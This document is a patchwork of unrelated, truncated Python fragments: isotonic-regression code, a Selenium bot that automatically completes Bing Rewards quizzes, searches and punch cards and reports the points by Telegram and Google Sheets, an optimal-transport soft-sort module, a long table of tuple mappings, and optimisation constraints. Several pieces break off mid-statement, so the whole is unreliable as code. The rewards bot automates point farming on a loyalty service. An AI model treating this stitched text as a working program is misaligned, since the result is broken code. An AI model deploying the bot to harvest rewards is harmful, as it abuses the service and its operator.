cdf=self.cdf[leaf_ids_,:] #get_cum_probabilities()
weights=self.sample_weight[leaf_ids_]
cdf_iso=np.ones(cdf.shape)
pdf_iso=np.zeros(cdf.shape)
cum_sse=0.
for i_class in np.arange(cdf.shape[1]):
probs_class=cdf[:,i_class]
gir=isoensemble.GeneralisedIsotonicRegression()
if i_class<cdf.shape[1]-1:
#cdf_iso[:,i_class]=gir.fit(probs_class,pm_pairs_clean,sample_weight=weights,increasing=False)
#print(probs_class)
cdf_iso[:,i_class]=np.round(gir.fit(probs_class,leaf_id_pairs,sample_weight=weights,increasing=False),6)
if i_class==0:
pdf_iso[:,i_class]=cdf_iso[:,i_class]
else:
pdf_iso[:,i_class]=cdf_iso[:,i_class]-cdf_iso[:,i_class-1]
cum_sse=np.sum((cdf_iso-cdf)**2)
# update the leave probabilities
if cum_sse>1e-7: # some changes were made
self.cdf[leaf_ids_,:]=cdf_iso
self.pred_class[leaf_ids_]=np.argmax(self.cdf[leaf_ids_,:]>=0.5, axis=1)
# for leaf in self.leaf_nodes:
# leaf._probabilities=list(pdf_iso[leaf.index_leaf,:])
# if np.isnan(leaf._probabilities[0]):
# print('what | |
alerts
'''
try:
driver.switch_to.alert.dismiss()
except (NoAlertPresentException, UnexpectedAlertPresentException):
pass
def __is_offer_sign_in_bug(self, driver):
'''
Sometimes when clicking an offer for the first time, it will show a page saying the user is not signed in. Pretty sure it's a Bing bug. This method checks for this bug
'''
try:
driver.find_element(By.CLASS_NAME, 'identityStatus')
return True
except NoSuchElementException:
return False
def __has_overlay(self, driver):
'''most offers that have the word 'quiz' in title have a btOverlay ID. However, certain quizzes that related to special events i.e. halloween do not have this overlay'''
self.__sys_out("Starting quiz", 3)
try_count = 0
while True:
try:
driver.find_element(By.ID, "btOverlay")
return True
except NoSuchElementException:
try_count += 1
if try_count >= 1:
self.__sys_out("Could not detect quiz overlay", 3, True)
return False
time.sleep(2)
def __click_offer(self, driver, offer, title_xpath, checked_xpath):
title = offer.find_element(By.XPATH, title_xpath).text
self.__sys_out("Trying {0}".format(title), 2)
# check whether it was already completed
checked = False
try:
icon = offer.find_element(By.XPATH, checked_xpath)
if icon.get_attribute('class').startswith(
"mee-icon mee-icon-SkypeCircleCheck"
):
checked = True
self.__sys_out("Already checked", 2, True)
#quiz does not contain a check-mark icon, implying no points offered
except NoSuchElementException:
checked = True
self.__sys_out("skipping quiz - assuming it offers no points", 3)
completed = True
if not checked:
offer.click()
driver.switch_to.window(driver.window_handles[-1])
#Check for cookies popup - UK thing
if self.cookieclearquiz == 0:
self.__sys_out("Checking cookies popup", 3)
try:
WebDriverWait(driver, self.__WEB_DRIVER_WAIT_SHORT).until(
EC.element_to_be_clickable((By.ID, "bnp_btn_accept"))
).click()
self.__sys_out("cookie popup cleared", 3)
self.cookieclearquiz = 1
except TimeoutException:
self.__sys_out("No cookie popup present", 3)
self.cookieclearquiz = 1
if self.__is_offer_sign_in_bug(driver):
completed = -1
elif "poll" in title.lower():
completed = self.__poll(driver, title.lower())
#if "quiz" in title.lower()
else:
if self.__has_overlay(driver):
completed = self.__quiz(driver)
else:
completed = self.__quiz2(driver)
if completed == -1:
self.__sys_out(
"Sign in Bing bug for offer {0}, will try again".
format(title), 2, True
)
elif completed:
self.__sys_out(
"Successfully completed {0}".format(title), 2, True
)
else:
self.__sys_out("Failed to complete {0}".format(title), 2, True)
driver.switch_to.window(driver.window_handles[0])
self.__open_dashboard(driver) # for stale element exception
return completed
def map_offers(self, driver):
'''
Creates a dictionary where (k, v)= (offer title, offer element)
Useful for testing individual offers
'''
self.__open_dashboard(driver)
title_to_offer = {}
for i in range(3):
offer = driver.find_element(By.XPATH,
'//*[@id="daily-sets"]/mee-card-group[1]/div/mee-card[{}]/div/card-content/mee-rewards-daily-set-item-content/div/a'
.format(i + 1)
)
title = offer.find_element(By.XPATH, './div[2]/h3').text
title_to_offer[title + str(i)] = offer
for i in range(30):
try:
offer = driver.find_element(By.XPATH,
'//*[@id="more-activities"]/div/mee-card[{}]/div/card-content/mee-rewards-more-activities-card-item/div/a'
.format(i + 1)
)
title = offer.find_element(By.XPATH, './div[2]/h3').text
title_to_offer[title + str(i)] = offer
i += 1
except NoSuchElementException:
pass
return title_to_offer
def __iterate_offers(self, driver, offer_xpath, completed, offer_count):
#try statement in case we try to find an offer that exceeded the range index
try:
for i in range(offer_count):
c = -1
try_count = 0
while c == -1 and try_count <= 2:
offer = driver.find_element(By.XPATH,
offer_xpath.format(offer_index=i + 1)
)
c = self.__click_offer(
driver, offer, './div[2]/h3',
'./mee-rewards-points/div/div/span[1]'
)
try_count += 1
#first quiz never started (MS bug) but pts still awarded
if i == 0 and offer_count == 3:
completed.append(True)
else:
completed.append(c)
except NoSuchElementException:
completed.append(-1)
return completed
def __offers(self, driver):
# showcase offer
self.__open_dashboard(driver)
completed = []
#daily set
offer_xpath = '//*[@id="daily-sets"]/mee-card-group[1]/div/mee-card[{offer_index}]/div/card-content/mee-rewards-daily-set-item-content/div/a'
self.__iterate_offers(driver, offer_xpath, completed, offer_count=3)
# remaining offers
remaining_offer_count = len(driver.find_elements(By.XPATH,
'//*[@id="more-activities"]/div/mee-card'
))
offer_xpath = '//*[@id="more-activities"]/div/mee-card[{offer_index}]/div/card-content/mee-rewards-more-activities-card-item/div/a'
self.__iterate_offers(driver, offer_xpath, completed, offer_count=remaining_offer_count)
return min(completed)
def __punchcard_activity(self, driver, parent_url, childPromotions):
"""
Each punch card has multiple activities.
Completes the latest punch card activity.
"""
for activity_index, activity in enumerate(childPromotions):
if activity['complete'] is False:
activity_title = activity['title']
self.__sys_out(f'Starting activity "{activity_title}"', 2)
if activity['promotionType'] == "quiz":
activity_url = activity['attributes']['destination']
#can't use redirect link b/c it disappears if you want to start a quiz that was already in progress
driver.get(activity_url)
time.sleep(2)
if self.__is_offer_sign_in_bug(driver):
driver.get(activity_url)
if self.__has_overlay(driver):
self.__quiz(driver)
else:
self.__quiz2(driver)
elif activity['promotionType'] == "urlreward":
driver.get(parent_url)
time.sleep(2)
#will only get points if you click the redirect link, can't go to the page directly
driver.execute_script("document.getElementsByClassName('offer-cta')[0].click()")
time.sleep(2)
driver.close()
driver.switch_to.window(driver.window_handles[0])
#no point doing remaining activities due to 24 hour wait restriction
break
# return the activity number so we can get it's progress later
return activity_index
def __punchcard(self, driver):
is_complete_activity = True
punchcards = self.get_dashboard_data(driver)['punchCards']
# find valid punchcard
for punchcard_index, punchcard in enumerate(punchcards):
# Check if valid punchcard
if punchcard['parentPromotion'] \
and 'appstore' not in punchcard['parentPromotion']['attributes']['type'] \
and punchcard['parentPromotion']['pointProgressMax'] != 0 \
and punchcard['childPromotions']:
parent_url = punchcard['parentPromotion']['attributes']['destination']
title = punchcard['parentPromotion']['attributes']['title']
# check if valid punchcard is completed
is_complete_punchcard = punchcard['parentPromotion']['complete']
if not is_complete_punchcard:
self.__sys_out(f'Punch card "{title}" is not complete yet.', 2)
#complete latest punch card activity
activity_index = self.__punchcard_activity(driver, parent_url, punchcard['childPromotions'])
is_complete_activity = self.get_dashboard_data(driver)['punchCards'][punchcard_index]['childPromotions'][activity_index]['complete']
if is_complete_activity:
self.__sys_out('Latest punch card activity successfully completed!', 3)
else:
self.__sys_out('Latest punch card activity NOT successfully completed. Possibly not enough time has elapsed since last punch.', 3)
else:
self.__sys_out(f'Punch card "{title}" is already completed.', 2)
driver.get(parent_url)
punchcard_progress = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.XPATH, "//div[@class='punchcard-completion-row']"))).text
self.__sys_out(f'Overall punch card progress: {punchcard_progress}', 2)
return is_complete_punchcard or is_complete_activity
def __complete_edge_search(self, driver=None, close=False):
self.__sys_out("Starting Edge search", 1)
try:
if driver is None:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.edge_search = self.__search(
driver, Driver.WEB_DEVICE, is_edge=True
)
if self.completion.edge_search:
self.__sys_out("Successfully completed edge search", 1, True)
else:
self.__sys_out("Failed to complete edge search", 1, True)
except:
try:
driver.quit()
except AttributeError: # not yet initialized
pass
raise
if close:
driver.quit()
else:
return driver
def __complete_web_search(self, driver=None, close=False):
self.__sys_out("Starting web search", 1)
try:
if driver is None:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.web_search = self.__search(
driver, Driver.WEB_DEVICE
)
if self.completion.web_search:
self.__sys_out("Successfully completed web search", 1, True)
else:
self.__sys_out("Failed to complete web search", 1, True)
except:
try:
driver.quit()
except AttributeError: # not yet initialized
pass
raise
if close:
driver.quit()
else:
return driver
def __complete_mobile_search(self, driver=None, close=False):
self.__sys_out("Starting mobile search", 1)
try:
if driver is None:
driver = Driver.get_driver(
self.path, Driver.MOBILE_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.mobile_search = self.__search(
driver, Driver.MOBILE_DEVICE
)
if self.completion.mobile_search:
self.__sys_out("Successfully completed mobile search", 1, True)
else:
self.__sys_out("Failed to complete mobile search", 1, True)
except:
try:
driver.quit()
except AttributeError: # not yet initialized
pass
raise
if close:
driver.quit()
else:
return driver
def __complete_offers(self, driver=None):
self.__sys_out("Starting offers", 1)
try:
if not driver:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.offers = self.__offers(driver)
if self.completion.offers == -1 or not self.completion.offers:
self.__sys_out("Failed to complete offers", 1, True)
else:
self.__sys_out("Successfully completed offers", 1, True)
except:
try:
driver.quit()
except AttributeError:
pass
raise
return driver
def __complete_punchcard(self, driver=None):
self.__sys_out("Starting punch card", 1)
try:
if not driver:
driver = Driver.get_driver(
self.path, Driver.WEB_DEVICE, self.headless, self.cookies
)
self.__login(driver)
self.completion.punchcard = self.__punchcard(driver)
if not self.completion.punchcard:
self.__sys_out("Failed to complete latest punch card activity", 1, True)
else:
self.__sys_out("Completed latest punch card activity OR entire punch card already completed", 1, True)
except:
try:
driver.quit()
except AttributeError:
pass
raise
return driver
def __print_stats(self, driver):
try:
self.__open_dashboard(driver)
#once pointsbreakdown link is clickable, page is loaded
WebDriverWait(driver, self.__WEB_DRIVER_WAIT_SHORT).until(
EC.element_to_be_clickable(
(
By.XPATH,
'//*[@id="rx-user-status-action"]/span/ng-transclude'
)
)
)
#sleep an additional 5 seconds to make sure stats are loaded
time.sleep(self.__WEB_DRIVER_WAIT_SHORT)
stats = driver.find_elements(By.XPATH,
'//mee-rewards-counter-animation//span'
)
#level 2
earned_index = 4
streak_index = 2
days_till_bonus_index = 3
avail_index = 0
#level 1
if len(stats) == 6:
earned_index += 1
streak_index += 1
days_till_bonus_index += 1
avail_index += 1
self.__sys_out("Summary", 1, flush=True)
self.__sys_out(
"Points earned: " +
stats[earned_index].text.replace(" ", ""), 2
)
self.__sys_out("Streak count: " + stats[streak_index].text, 2)
self.__sys_out(
stats[days_till_bonus_index].text, 2, end=True
) # streak details, ex. how many days remaining, bonus earned
self.__sys_out(
"Available points: " + stats[avail_index].text, 2
)
if self.telegram_messenger:
self.__sys_out(
"Sending Telegram Notification", 2
)
current_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
to_send = f'\n Summary for {self.email} at : {current_time} \n\n' \
f'Points earned today: {stats[earned_index].text.replace(" ", "")} \n' \
f'Streak count : {stats[streak_index].text} \n' \
f'{stats[days_till_bonus_index].text} \n' \
f'Available points: {stats[avail_index].text} \n'
resp = self.telegram_messenger.send_message(to_send)
if resp.status_code == 200:
self.__sys_out(
"Telegram notification sent", 3
)
else:
self.__sys_out(
f"Boo! Telegram notification NOT sent, response is: {resp}", 3
)
if self.googlespreadsheet_reporting:
self.__sys_out(
"Adding row to Google SpreadSheet", 2
)
current_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
user = f'{self.email}'
points_earned_today = f'{stats[earned_index].text.replace(" ", "")}'
streak_count = f'{stats[streak_index].text}'
days_till_bonus_count = f'{stats[days_till_bonus_index].text}'
available_points = int(f'{stats[avail_index].text.replace(".", "").replace(",", "")}')
resp = self.googlespreadsheet_reporting.add_row(current_time, user, points_earned_today, streak_count, days_till_bonus_count, available_points)
if int(f"{resp['updates']['updatedRows']}") >= 1:
self.__sys_out(
"Row added to Google SpreadSheet succesfully", 3
)
else:
self.__sys_out(
f"Boo! Row | |
# coding=utf-8
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Soft sort operators."""
import functools
from typing import Callable, Optional
import jax
import jax.numpy as jnp
import numpy as np
from ott.tools import transport
def transport_for_sort(
    inputs: jnp.ndarray,
    weights: jnp.ndarray,
    target_weights: jnp.ndarray,
    squashing_fun: Optional[Callable[[jnp.ndarray], jnp.ndarray]] = None,
    epsilon: float = 1e-2,
    **kwargs) -> jnp.ndarray:
  r"""Solves reg. OT, from inputs to a weighted family of increasing values.

  Args:
    inputs: jnp.ndarray[num_points]. Must be one dimensional.
    weights: jnp.ndarray[num_points]. Weight vector `a` for input values.
    target_weights: jnp.ndarray[num_targets]: Weight vector of the target
      measure. It may be of different size than `weights`.
    squashing_fun: function taking an array to squash all its entries in [0,1].
      sigmoid of whitened values by default. Can be set to be the identity by
      passing ``squashing_fun = lambda x : x`` instead.
    epsilon: the regularization parameter.
    **kwargs: keyword arguments for `sinkhorn` and / or `PointCloud`.

  Returns:
    A jnp.ndarray<float> num_points x num_target transport matrix, from all
    inputs onto the sorted target.

  Raises:
    ValueError: if ``inputs`` is not one-dimensional (or a column vector).
  """
  shape = inputs.shape
  if len(shape) > 2 or (len(shape) == 2 and shape[1] != 1):
    # BUGFIX: this string was missing its f-prefix, so "{shape}" was printed
    # literally instead of the offending shape.
    raise ValueError(
        f'Shape ({shape}) not supported. The input should be one-dimensional.')

  x = jnp.expand_dims(jnp.squeeze(inputs), axis=1)
  # Default squashing: sigmoid of standardized values, mapping into (0, 1)
  # so inputs are comparable with the [0, 1]-spaced targets below.
  if squashing_fun is None:
    squashing_fun = lambda z: jax.nn.sigmoid(
        (z - jnp.mean(z)) / (jnp.std(z) + 1e-10))
  x = squashing_fun(x)
  a = jnp.squeeze(weights)
  b = jnp.squeeze(target_weights)
  num_targets = b.shape[0]
  y = jnp.linspace(0.0, 1.0, num_targets)[:, jnp.newaxis]
  return transport.solve(x, y, a=a, b=b, epsilon=epsilon, **kwargs)
def apply_on_axis(op, inputs, axis, *args, **kwargs):
  """Applies a differentiable operator on a given axis of the input.

  Args:
    op: a differentiable operator (can be ranks, quantile, etc.)
    inputs: jnp.ndarray<float> of any shape.
    axis: the axis (int) or tuple of ints on which to apply the operator. If
      several axes are passed to the operator, those are merged as a single
      dimension.
    *args: other positional arguments to the operator.
    **kwargs: other keyword arguments to the operator.

  Returns:
    A jnp.ndarray holding the output of the differentiable operator on the given
    axis.
  """
  op_inner = functools.partial(op, **kwargs)
  # Normalize `axis` to a tuple; negative indices are resolved by the
  # arange-based lookups below.
  axis = (axis,) if isinstance(axis, int) else axis
  # Total number of elements across the merged (selected) axes.
  num_points = np.prod(np.array(inputs.shape)[tuple([axis])])
  permutation = np.arange(len(inputs.shape))
  axis = tuple(permutation[a] for a in axis)
  # Move the untouched axes to the front and the selected axes (sorted) last.
  permutation = tuple(sorted(set(permutation) - set(axis)) + sorted(axis))
  inputs = jnp.transpose(inputs, permutation)
  # Flatten to (batch, num_points) and vectorize the operator over the batch
  # dimension; extra positional args are broadcast (in_axes=None), not mapped.
  batch_fn = jax.vmap(op_inner, in_axes=(0,) + (None,) * len(args))
  result = batch_fn(jnp.reshape(inputs, (-1, num_points)), *args)
  shrink = len(axis)
  # Restore the leading batch shape; the operator may change the size of the
  # last dimension (e.g. topk in soft sort).
  result = jnp.reshape(result, inputs.shape[:-shrink] + result.shape[-1:])
  permutation = tuple(range(len(result.shape)))
  rank = len(result.shape) - 1
  axis = min(axis)
  # Move the operator's output axis back to the first selected axis' position.
  permutation = permutation[:axis] + (rank,) + permutation[axis:-1]
  result = jnp.transpose(result, permutation)
  return result
def _sort(inputs: jnp.ndarray, topk, num_targets, **kwargs) -> jnp.ndarray:
  """Applies the soft sort operator on a one dimensional array."""
  n = inputs.shape[0]
  a = jnp.ones((n,)) / n
  if not 0 < topk < n:
    # Full soft sort onto `num_targets` uniformly weighted targets.
    m = n if num_targets is None else num_targets
    b = jnp.ones((m,)) / m
    start_index = 0
  else:
    # Only the top-k outputs matter: lump the remaining mass onto a single
    # extra target, dropped from the returned slice below.
    b = jnp.concatenate([
        jnp.array([(n - topk) / n]),
        jnp.ones(topk, dtype=inputs.dtype) / n
    ])
    start_index = 1
  ot = transport_for_sort(inputs, a, b, **kwargs)
  sorted_vals = 1.0 / b * ot.apply(inputs, axis=0)
  return sorted_vals[start_index:]
def sort(inputs: jnp.ndarray,
         axis: int = -1,
         topk: int = -1,
         num_targets: Optional[int] = None,
         **kwargs) -> jnp.ndarray:
  r"""Soft-sorts ``inputs`` along ``axis`` using regularized optimal transport.

  Args:
    inputs: jnp.ndarray<float> of any shape.
    axis: the axis along which values are (softly) sorted.
    topk: when set to a positive value, only the ``topk`` largest composite
      values are returned, which also reduces the cost of soft sorting.
    num_targets: number of composite sorted values produced when ``topk`` is
      not set; each output is a convex combination of input values, listed
      in increasing order.  Defaults to the size of the sorted slices, so
      the number of composite sorted values equals that of the inputs.
    **kwargs: forwarded to lower level functions.  Of interest to the user
      are ``squashing_fun``, which redistributes the values in ``inputs`` to
      lie in [0,1] (sigmoid of whitened values by default) before solving
      the optimal transport problem; ``cost_fn``, used in ``PointCloud``,
      defining the ground cost to transport from ``inputs`` to the
      ``num_targets`` target values (squared Euclidean distance by default,
      see ``pointcloud.py``); ``epsilon`` and other parameters shaping the
      ``sinkhorn`` algorithm.

  Returns:
    A jnp.ndarray of the same shape as ``inputs`` with soft sorted values on
    the given axis (that axis shrinks to ``topk`` entries when it is set).
  """
  return apply_on_axis(_sort, inputs, axis, topk, num_targets, **kwargs)
def _ranks(inputs: jnp.ndarray, num_targets, **kwargs) -> jnp.ndarray:
  """Applies the soft ranks operator on a one dimensional array."""
  n = inputs.shape[0]
  m = n if num_targets is None else num_targets
  a = jnp.ones((n,)) / n
  b = jnp.ones((m,)) / m
  ot = transport_for_sort(inputs, a, b, **kwargs)
  # Barycenter of target indices under each transport row yields soft ranks.
  soft_ranks = 1.0 / a * ot.apply(jnp.arange(m), axis=1)
  return jnp.reshape(soft_ranks, inputs.shape)
def ranks(inputs: jnp.ndarray,
          axis: int = -1,
          num_targets: Optional[int] = None,
          **kwargs) -> jnp.ndarray:
  r"""Applies the soft rank operator on the input tensor.

  Args:
    inputs: a jnp.ndarray<float> of any shape.
    axis: the axis on which to apply the soft ranks operator.
    num_targets: num_targets defines the number of targets used to compute a
      composite rank for each value in ``inputs``: that soft rank will be a
      convex combination of values in [0,...,``(num_targets-2)/num_targets``,1]
      specified by the optimal transport between values in ``inputs`` towards
      those values. If not specified, ``num_targets`` is set by default to be
      the size of the slices of the input that are sorted.
    **kwargs: keyword arguments passed on to lower level functions. Of interest
      to the user are ``squashing_fun``, which will redistribute the values in
      ``inputs`` to lie in [0,1] (sigmoid of whitened values by default) to
      solve the optimal transport problem; ``cost_fn``, used in ``PointCloud``,
      that defines the ground cost function to transport from ``inputs`` to the
      ``num_targets`` target values (squared Euclidean distance by default, see
      ``pointcloud.py`` for more details); ``epsilon`` values as well as other
      parameters to shape the ``sinkhorn`` algorithm.

  Returns:
    A jnp.ndarray<float> of the same shape as inputs, with the soft ranks.
  """
  return apply_on_axis(_ranks, inputs, axis, num_targets, **kwargs)
def quantile(inputs: jnp.ndarray,
axis: int = -1,
level: float = 0.5,
weight: float = 0.05,
**kwargs) -> jnp.ndarray:
r"""Applies the soft quantile operator on the input tensor.
For instance:
x = jax.random.uniform(rng, (1000,))
q = quantile(x, 0.5, 0.01)
Then q will be computed as a mean over the 10 median points of x.
Therefore, there is a tradeoff between accuracy and gradient.
Args:
inputs: a jnp.ndarray<float> of any shape.
axis: the axis on which to apply the operator.
level: the value of the quantile level to be computed. 0.5 for median.
weight: the weight of the quantile in the transport problem.
**kwargs: keyword arguments passed on to lower level functions. Of interest
to the user are ``squashing_fun``, which will redistribute the values in
``inputs`` to lie in [0,1] (sigmoid of whitened values by default) to
solve the optimal transport problem; ``cost_fn``, used in ``PointCloud``,
that defines the ground cost function to transport from ``inputs`` to the
``num_targets`` target values (squared Euclidean distance by default, see
``pointcloud.py`` for more details); ``epsilon`` values as well as other
parameters to shape the ``sinkhorn`` algorithm.
Returns:
A jnp.ndarray, which has the same shape as the input, except on the give
axis on which the dimension is 1.
"""
# TODO(cuturi,oliviert) option to compute several quantiles at once, as in tf.
def _quantile(inputs: jnp.ndarray,
level: float,
weight: float,
**kwargs) -> jnp.ndarray:
num_points = inputs.shape[0]
a | |
-4): (1, 1),
(9, 28, 0, -3): (1, 1),
(9, 28, 0, -2): (1, 1),
(9, 28, 0, -1): (0, 1),
(9, 28, 0, 0): (-1, 1),
(9, 28, 0, 1): (-1, 1),
(9, 28, 0, 2): (-1, 0),
(9, 28, 0, 3): (-1, -1),
(9, 28, 0, 4): (-1, -1),
(9, 28, 0, 5): (-1, -1),
(9, 28, 1, -5): (0, 1),
(9, 28, 1, -4): (0, 1),
(9, 28, 1, -3): (0, 1),
(9, 28, 1, -2): (0, 1),
(9, 28, 1, -1): (0, 1),
(9, 28, 1, 0): (0, 1),
(9, 28, 1, 1): (0, 0),
(9, 28, 1, 2): (0, -1),
(9, 28, 1, 3): (0, 1),
(9, 28, 1, 4): (0, 1),
(9, 28, 1, 5): (0, 1),
(9, 28, 2, -5): (0, 1),
(9, 28, 2, -4): (0, 1),
(9, 28, 2, -3): (0, 1),
(9, 28, 2, -2): (0, 1),
(9, 28, 2, -1): (0, 1),
(9, 28, 2, 0): (0, 1),
(9, 28, 2, 1): (0, 0),
(9, 28, 2, 2): (-1, -1),
(9, 28, 2, 3): (0, 1),
(9, 28, 2, 4): (0, 1),
(9, 28, 2, 5): (0, 1),
(9, 28, 3, -5): (0, 1),
(9, 28, 3, -4): (0, 1),
(9, 28, 3, -3): (0, 1),
(9, 28, 3, -2): (0, 1),
(9, 28, 3, -1): (0, 1),
(9, 28, 3, 0): (0, 1),
(9, 28, 3, 1): (0, 0),
(9, 28, 3, 2): (-1, -1),
(9, 28, 3, 3): (0, 1),
(9, 28, 3, 4): (0, 1),
(9, 28, 3, 5): (0, 1),
(9, 28, 4, -5): (0, 1),
(9, 28, 4, -4): (0, 1),
(9, 28, 4, -3): (0, 1),
(9, 28, 4, -2): (0, 1),
(9, 28, 4, -1): (0, 1),
(9, 28, 4, 0): (0, 1),
(9, 28, 4, 1): (0, 0),
(9, 28, 4, 2): (-1, -1),
(9, 28, 4, 3): (0, 1),
(9, 28, 4, 4): (0, 1),
(9, 28, 4, 5): (0, 1),
(9, 28, 5, -5): (0, 1),
(9, 28, 5, -4): (0, 1),
(9, 28, 5, -3): (0, 1),
(9, 28, 5, -2): (0, 1),
(9, 28, 5, -1): (0, 1),
(9, 28, 5, 0): (0, 1),
(9, 28, 5, 1): (0, 0),
(9, 28, 5, 2): (-1, -1),
(9, 28, 5, 3): (0, 1),
(9, 28, 5, 4): (0, 1),
(9, 28, 5, 5): (0, 1),
(9, 29, -5, -5): (0, 1),
(9, 29, -5, -4): (0, 1),
(9, 29, -5, -3): (0, 1),
(9, 29, -5, -2): (0, 1),
(9, 29, -5, -1): (0, 1),
(9, 29, -5, 0): (0, 1),
(9, 29, -5, 1): (0, 1),
(9, 29, -5, 2): (0, 1),
(9, 29, -5, 3): (0, 0),
(9, 29, -5, 4): (-1, -1),
(9, 29, -5, 5): (0, 1),
(9, 29, -4, -5): (0, 1),
(9, 29, -4, -4): (0, 1),
(9, 29, -4, -3): (0, 1),
(9, 29, -4, -2): (0, 1),
(9, 29, -4, -1): (1, 1),
(9, 29, -4, 0): (1, 1),
(9, 29, -4, 1): (1, 1),
(9, 29, -4, 2): (0, 1),
(9, 29, -4, 3): (0, 0),
(9, 29, -4, 4): (-1, -1),
(9, 29, -4, 5): (0, 1),
(9, 29, -3, -5): (-1, 1),
(9, 29, -3, -4): (-1, 1),
(9, 29, -3, -3): (-1, 1),
(9, 29, -3, -2): (-1, 1),
(9, 29, -3, -1): (0, 1),
(9, 29, -3, 0): (0, 1),
(9, 29, -3, 1): (0, 1),
(9, 29, -3, 2): (-1, 1),
(9, 29, -3, 3): (-1, 0),
(9, 29, -3, 4): (-1, -1),
(9, 29, -3, 5): (-1, 1),
(9, 29, -2, -5): (0, 1),
(9, 29, -2, -4): (0, 1),
(9, 29, -2, -3): (0, 1),
(9, 29, -2, -2): (1, 1),
(9, 29, -2, -1): (-1, 1),
(9, 29, -2, 0): (-1, 1),
(9, 29, -2, 1): (-1, 1),
(9, 29, -2, 2): (-1, 0),
(9, 29, -2, 3): (-1, -1),
(9, 29, -2, 4): (-1, -1),
(9, 29, -2, 5): (-1, 1),
(9, 29, -1, -5): (1, 1),
(9, 29, -1, -4): (1, 1),
(9, 29, -1, -3): (1, 1),
(9, 29, -1, -2): (1, 1),
(9, 29, -1, -1): (0, 1),
(9, 29, -1, 0): (-1, 1),
(9, 29, -1, 1): (-1, 1),
(9, 29, -1, 2): (-1, 0),
(9, 29, -1, 3): (-1, -1),
(9, 29, -1, 4): (-1, -1),
(9, 29, -1, 5): (-1, 1),
(9, 29, 0, -5): (1, 1),
(9, 29, 0, -4): (1, 1),
(9, 29, 0, -3): (1, 1),
(9, 29, 0, -2): (1, 1),
(9, 29, 0, -1): (-1, 1),
(9, 29, 0, 0): (-1, 1),
(9, 29, 0, 1): (-1, 0),
(9, 29, 0, 2): (-1, -1),
(9, 29, 0, 3): (-1, -1),
(9, 29, 0, 4): (-1, -1),
(9, 29, 0, 5): (-1, 1),
(9, 29, 1, -5): (0, 1),
(9, 29, 1, -4): (0, 1),
(9, 29, 1, -3): (0, 1),
(9, 29, 1, -2): (0, 1),
(9, 29, 1, -1): (0, 1),
(9, 29, 1, 0): (0, 0),
(9, 29, 1, 1): (-1, -1),
(9, 29, 1, 2): (0, 1),
(9, 29, 1, 3): (0, 1),
(9, 29, 1, 4): (0, 1),
(9, 29, 1, 5): (0, 1),
(9, 29, 2, -5): (0, 1),
(9, 29, 2, -4): (0, 1),
(9, 29, 2, -3): (0, 1),
(9, 29, 2, -2): (0, 1),
(9, 29, 2, -1): (0, 1),
(9, 29, 2, 0): (0, 0),
(9, 29, 2, 1): (-1, -1),
(9, 29, 2, 2): (0, 1),
(9, 29, 2, 3): (0, 1),
(9, 29, 2, 4): (0, 1),
(9, 29, 2, 5): (0, 1),
(9, 29, 3, -5): (0, 1),
(9, 29, 3, -4): (0, 1),
(9, 29, 3, -3): (0, 1),
(9, 29, 3, -2): (0, 1),
(9, 29, 3, -1): (0, 1),
(9, 29, 3, 0): (0, 0),
(9, 29, 3, 1): (-1, -1),
(9, 29, 3, 2): (0, 1),
(9, 29, 3, 3): (0, 1),
(9, 29, 3, 4): (0, 1),
(9, 29, 3, 5): (0, 1),
(9, 29, 4, -5): (0, 1),
(9, 29, 4, -4): (0, 1),
(9, 29, 4, -3): (0, 1),
(9, 29, 4, -2): (0, 1),
(9, 29, 4, -1): (0, 1),
(9, 29, 4, 0): (0, 0),
(9, 29, 4, 1): (-1, -1),
(9, 29, 4, 2): (0, 1),
(9, 29, 4, 3): (0, 1),
(9, 29, 4, 4): (0, 1),
(9, 29, 4, 5): (0, 1),
(9, 29, 5, -5): (0, 1),
(9, 29, 5, -4): (0, 1),
(9, 29, 5, -3): (0, 1),
(9, 29, 5, -2): (0, 1),
(9, 29, 5, -1): (0, 1),
(9, 29, 5, 0): (0, 0),
(9, 29, 5, 1): (-1, -1),
(9, 29, 5, 2): (0, 1),
(9, 29, 5, 3): (0, 1),
(9, 29, 5, 4): (0, 1),
(9, 29, 5, 5): (0, 1),
(9, 30, -5, -5): (0, 1),
(9, 30, -5, -4): (0, 1),
(9, 30, -5, -3): (0, 1),
(9, 30, -5, -2): (0, 1),
(9, 30, -5, -1): (0, 1),
(9, 30, -5, 0): (0, 1),
(9, 30, -5, 1): (0, 1),
(9, 30, -5, 2): (0, 0),
(9, 30, -5, 3): (-1, -1),
(9, 30, -5, 4): (-1, -1),
(9, 30, -5, 5): (0, 1),
(9, 30, -4, -5): (0, 1),
(9, 30, -4, -4): (0, 1),
(9, 30, -4, -3): (0, 1),
(9, 30, -4, -2): (1, 1),
(9, 30, -4, -1): (1, 1),
(9, 30, -4, 0): (1, 1),
(9, 30, -4, 1): (0, 1),
(9, 30, -4, 2): (0, 0),
(9, 30, -4, 3): (-1, -1),
(9, 30, -4, 4): (-1, -1),
(9, 30, -4, 5): (0, 1),
(9, 30, -3, -5): (-1, 1),
(9, 30, -3, -4): (-1, 1),
(9, 30, -3, -3): (-1, 1),
(9, 30, -3, -2): (0, 1),
(9, 30, -3, -1): (0, 1),
(9, 30, -3, 0): (0, | |
m.x201 - 82.091893062253*m.x851 - 4.62594653112602*m.x856 - 0.173783959337771*m.x861
+ m.x1611 == 0)
m.c612 = Constraint(expr= - m.x202 - 82.091893062253*m.x852 - 4.62594653112602*m.x857 - 0.173783959337771*m.x862
+ m.x1612 == 0)
m.c613 = Constraint(expr= - m.x203 - 82.091893062253*m.x853 - 4.62594653112602*m.x858 - 0.173783959337771*m.x863
